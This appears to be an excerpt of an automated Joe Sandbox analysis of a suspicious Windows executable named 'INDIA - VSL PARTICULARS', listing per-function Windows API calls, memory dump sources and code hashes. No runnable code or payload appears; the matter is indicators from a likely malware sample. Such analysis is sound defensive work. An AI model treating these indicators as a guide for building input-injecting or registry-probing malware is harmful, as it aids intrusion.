                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                              • String ID:
                              • API String ID: 2737351978-0
                              • Opcode ID: acaa13feec575fcc8965567212d79990a10c5ddbc5928143d32797644f5f1a34
                              • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                              • Opcode Fuzzy Hash: acaa13feec575fcc8965567212d79990a10c5ddbc5928143d32797644f5f1a34
                              • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 0041523A
                              • __calloc_crt.LIBCMT ref: 00415246
                              • __getptd.LIBCMT ref: 00415253
                              • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                              • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                              • _free.LIBCMT ref: 0041529E
                              • __dosmaperr.LIBCMT ref: 004152A9
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                              • String ID:
                              • API String ID: 3638380555-0
                              • Opcode ID: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                              • Instruction ID: 1ae632b5747f25178f06b1f704b10109f3b838f12a9538f44878b4cc3517b2ff
                              • Opcode Fuzzy Hash: 75aec11f1c25db1a83b42845bb08a83361ad021f560e0ff3c611ac6fdc7cb8ab
                              • Instruction Fuzzy Hash: 31110A33105B00ABD2102BB69C45ADB37A4DF85734B24065FF924862D1CA7C98814AAD
                              APIs
                              • VariantInit.OLEAUT32(?), ref: 0046C96E
                                • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Variant$Copy$ClearErrorInitLast
                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                              • API String ID: 3207048006-625585964
                              APIs
                              • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                              • inet_addr.WSOCK32(?), ref: 0046559B
                              • gethostbyname.WSOCK32(?), ref: 004655A6
                              • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                              • _memmove.LIBCMT ref: 004656CA
                              • GlobalFree.KERNEL32(00000000), ref: 0046575C
                              • WSACleanup.WSOCK32 ref: 00465762
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                              • String ID:
                              • API String ID: 2945290962-0
                              APIs
                              • GetSystemMetrics.USER32(0000000F), ref: 00440527
                              • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                              • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                              • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                              • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                              • String ID:
                              • API String ID: 1457242333-0
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ConnectRegistry_memmove_wcslen
                              • String ID:
                              • API String ID: 15295421-0
                              APIs
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • _wcstok.LIBCMT ref: 004675B2
                                • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                              • _wcscpy.LIBCMT ref: 00467641
                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                              • _wcslen.LIBCMT ref: 00467793
                              • _wcslen.LIBCMT ref: 004677BD
                                • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                              • String ID: X
                              • API String ID: 780548581-3081909835
                              APIs
                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                              • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                              • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                              • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                              • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                              • CloseFigure.GDI32(?), ref: 0044751F
                              • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                              • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                              • String ID:
                              • API String ID: 4082120231-0
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                              • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                              • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                              • String ID:
                              • API String ID: 2027346449-0
                              APIs
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                              • GetMenu.USER32 ref: 0047A703
                              • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                              • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                              • _wcslen.LIBCMT ref: 0047A79E
                              • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                              • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                              • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                              • String ID:
                              • API String ID: 3257027151-0
                              APIs
                              • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                              • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ErrorLastselect
                              • String ID:
                              • API String ID: 215497628-0
                              APIs
                              • GetParent.USER32(?), ref: 0044443B
                              • GetKeyboardState.USER32(?), ref: 00444450
                              • SetKeyboardState.USER32(?), ref: 004444A4
                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              APIs
                              • GetParent.USER32(?), ref: 00444633
                              • GetKeyboardState.USER32(?), ref: 00444648
                              • SetKeyboardState.USER32(?), ref: 0044469C
                              • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                              • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                              • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                              • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: MessagePost$KeyboardState$Parent
                              • String ID:
                              • API String ID: 87235514-0
                              APIs
                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                              • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                              • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                              • API String ID: 2354583917-0
                              • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                              • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                              • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                              APIs
                              • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                              • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                              • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                              • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                              Similarity
                              • API ID: AddressProc$Library$FreeLoad
                              • String ID: #v
                              • API String ID: 2449869053-554117064
                              • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                              • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                              • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                              • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                              • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                              • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                              APIs
                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                              • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                              Similarity
                              • API ID: Window$Enable$Show$MessageMoveSend
                              • API String ID: 896007046-0
                              • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                              • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                              • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                              APIs
                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                              • GetFocus.USER32 ref: 00448ACF
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                              Similarity
                              • API ID: Window$Enable$Show$FocusMessageSend
                              • API String ID: 3429747543-0
                              • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                              • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                              • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                              APIs
                              • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                              • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                              • __swprintf.LIBCMT ref: 0045D4E9
                              • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                              Similarity
                              • API ID: ErrorMode$InformationVolume__swprintf
                              • String ID: %lu$\VH
                              • API String ID: 3164766367-2432546070
                              • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                              • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                              • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                              APIs
                              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                              • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                              • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                              Similarity
                              • API ID: MessageSend
                              • String ID: Msctls_Progress32
                              • API String ID: 3850602802-3636473452
                              • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                              • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                              • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                              Similarity
                              • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                              • API String ID: 3985565216-0
                              • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                              • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                              • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                              APIs
                              • _malloc.LIBCMT ref: 0041F707
                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                              • _free.LIBCMT ref: 0041F71A
                              Similarity
                              • API ID: AllocateHeap_free_malloc
                              • String ID: [B
                              • API String ID: 1020059152-632041663
                              • Opcode ID: a147dbbc68d3dd3311601ddf04658a1c9df9f8119054b67091eb48bbc5a1b0d2
                              • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                              • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 00413DA4
                              • __calloc_crt.LIBCMT ref: 00413DB0
                              • __getptd.LIBCMT ref: 00413DBD
                              • CreateThread.KERNEL32(?,?,00413D1A,00000000,?,?), ref: 00413DF4
                              • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00413DFE
                              • _free.LIBCMT ref: 00413E07
                              • __dosmaperr.LIBCMT ref: 00413E12
                                • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                              Similarity
                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                              • API String ID: 155776804-0
                              • Opcode ID: 9a8a6ace70da3d00e2637234252d24079791dfe2cea1a90c5afbc93b71b6aba3
                              • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                              • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                              APIs
                                • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                              • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                              • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                              • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                              • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                              • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                              Similarity
                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                              • API String ID: 1957940570-0
                              • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                              • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                              • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                              • ExitThread.KERNEL32 ref: 00413D4E
                              • GetCurrentThreadId.KERNEL32 ref: 00413D54
                              • __freefls@4.LIBCMT ref: 00413D74
                              Similarity
                              • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                              • API String ID: 259663610-0
                              • Opcode ID: a6f8f3d0a20f5c796c32073770e32d9df078d3112ed711158995b20890782f5b
                              • Instruction ID: 675159a2c5a9d795bd3e19fa90b6febf5cd616b5876767659bafc4934cd781b8
                              • Instruction Fuzzy Hash: 0DF0FF75504700AFC704BF72D9498CE7BB9AF48349720846EB80987222DA3DD9C2DBA9
                              APIs
                              • GetClientRect.USER32(?,?), ref: 004302E6
                              • GetWindowRect.USER32(00000000,?), ref: 00430316
                              • GetClientRect.USER32(?,?), ref: 00430364
                              • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                              • GetWindowRect.USER32(?,?), ref: 004303C3
                              • ScreenToClient.USER32(?,?), ref: 004303EC
                              Similarity
                              • API ID: Rect$Client$Window$MetricsScreenSystem
                              • API String ID: 3220332590-0
                              • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                              • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                              • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                              Similarity
                              • API ID: _malloc_wcslen$_strcat_wcscpy
                              • String ID:
                              • API String ID: 1612042205-0
                              • Opcode ID: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                              • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                              • Opcode Fuzzy Hash: de986be264bc4095e11606319f6bc53bb2fe9b52cfcfc757ffd23d2b2712e847
                              • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                              APIs
                              Strings
                              Similarity
                              • API ID: _memmove_strncmp
                              • String ID: >$U$\
                              • API String ID: 2666721431-237099441
                              • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                              • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                              • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                              • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                              APIs
                              • GetKeyboardState.USER32(?), ref: 0044C570
                              • SetKeyboardState.USER32(00000080), ref: 0044C594
                              • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                              • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                              • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                              Similarity
                              • API ID: MessagePost$KeyboardState$InputSend
                              • String ID:
                              • API String ID: 2221674350-0
                              • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                              • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                              • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                              • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                              APIs
                              Similarity
                              • API ID: _wcscpy$_wcscat
                              • String ID:
                              • API String ID: 2037614760-0
                              • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                              • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                              • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                              • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                              APIs
                              • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                              • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                              • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                              • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                              • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                              • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                              Similarity
                              • API ID: Variant$Copy$AllocClearErrorLastString
                              • String ID:
                              • API String ID: 960795272-0
                              • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                              • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                              • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                              • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                              APIs
                              • BeginPaint.USER32(00000000,?), ref: 00447BDF
                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                              • EndPaint.USER32(?,?), ref: 00447D13
                              Similarity
                              • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                              • String ID:
                              • API String ID: 4189319755-0
                              • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                              • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                              • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                              • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                              APIs
                              • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                              • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                              • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                              • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
